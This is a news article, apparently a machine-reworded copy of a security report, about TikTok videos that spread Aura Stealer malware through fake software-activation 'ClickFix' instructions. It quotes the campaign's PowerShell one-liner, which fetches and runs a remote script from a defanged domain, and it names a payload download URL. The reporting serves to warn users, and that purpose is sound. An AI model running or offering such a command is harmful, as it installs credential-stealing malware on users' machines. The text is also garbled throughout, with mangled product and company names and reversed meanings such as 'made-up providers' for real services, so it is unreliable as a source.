Cybercriminals are utilizing TikTok movies disguised as free activation guides for well-liked software program like Home windows, Spotify, and Netflix to unfold information-stealing malware.
ISC Handler Xavier Mertens noticed the continuing marketing campaign, which is essentially the identical because the one noticed by Development Micro in Might
The TikTok movies seen by BleepingComputer fake to supply directions on learn how to activate authentic merchandise like Home windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Professional, and Discord Nitro, in addition to made-up providers comparable to Netflix and Spotify Premium.
Supply: BleepingComputer.com
The movies are performing a ClickFix assault, which is a social engineering method that gives what seems to be authentic “fixes” or directions that trick customers into executing malicious PowerShell instructions or different scripts that infect their computer systems with malware.
Every video shows a brief one-line command and tells viewers to run it as an administrator in PowerShell:
iex (irm slmgr[.]win/photoshop)
It needs to be famous that this system title within the URL is completely different relying on this system that’s being impersonated. For instance, within the pretend Home windows activation movies, as an alternative of the URL containing photoshop, it could embrace home windows.
On this marketing campaign, when the command is executed, PowerShell connects to the distant website slmgr[.]win to retrieve and execute one other PowerShell script.
This script downloads two executables from Cloudflare pages, with the primary executable downloaded from https://file-epq[.]pages[.]dev/updater.exe [VirusTotal]. This executable is a variant of the Aura Stealer info-stealing malware.
Aura Stealer collects saved credentials from browsers, authentication cookies, cryptocurrency wallets, and credentials from different purposes and uploads them to the attackers, giving them entry to your accounts.
Mertens says that an extra payload will likely be downloaded, named supply.exe [VirusTotal], which is used to self-compile code utilizing .NET’s built-in Visible C# Compiler (csc.exe). This code is then injected and launched in reminiscence.
The aim of the extra payload stays unclear.
Customers who carry out these steps ought to think about all of their credentials compromised and instantly reset their passwords on all websites they go to.
ClickFix assaults have change into very talked-about over the previous yr, used to distribute varied malware strains in ransomware and cryptocurrency theft campaigns.
As a normal rule, customers ought to by no means copy textual content from a web site and run it in an working system dialog field, together with throughout the File Explorer handle bar, command immediate, PowerShell prompts, macOS terminal, and Linux shells.
46% of environments had passwords cracked, practically doubling from 25% final yr.
Get the Picus Blue Report 2025 now for a complete have a look at extra findings on prevention, detection, and information exfiltration developments.
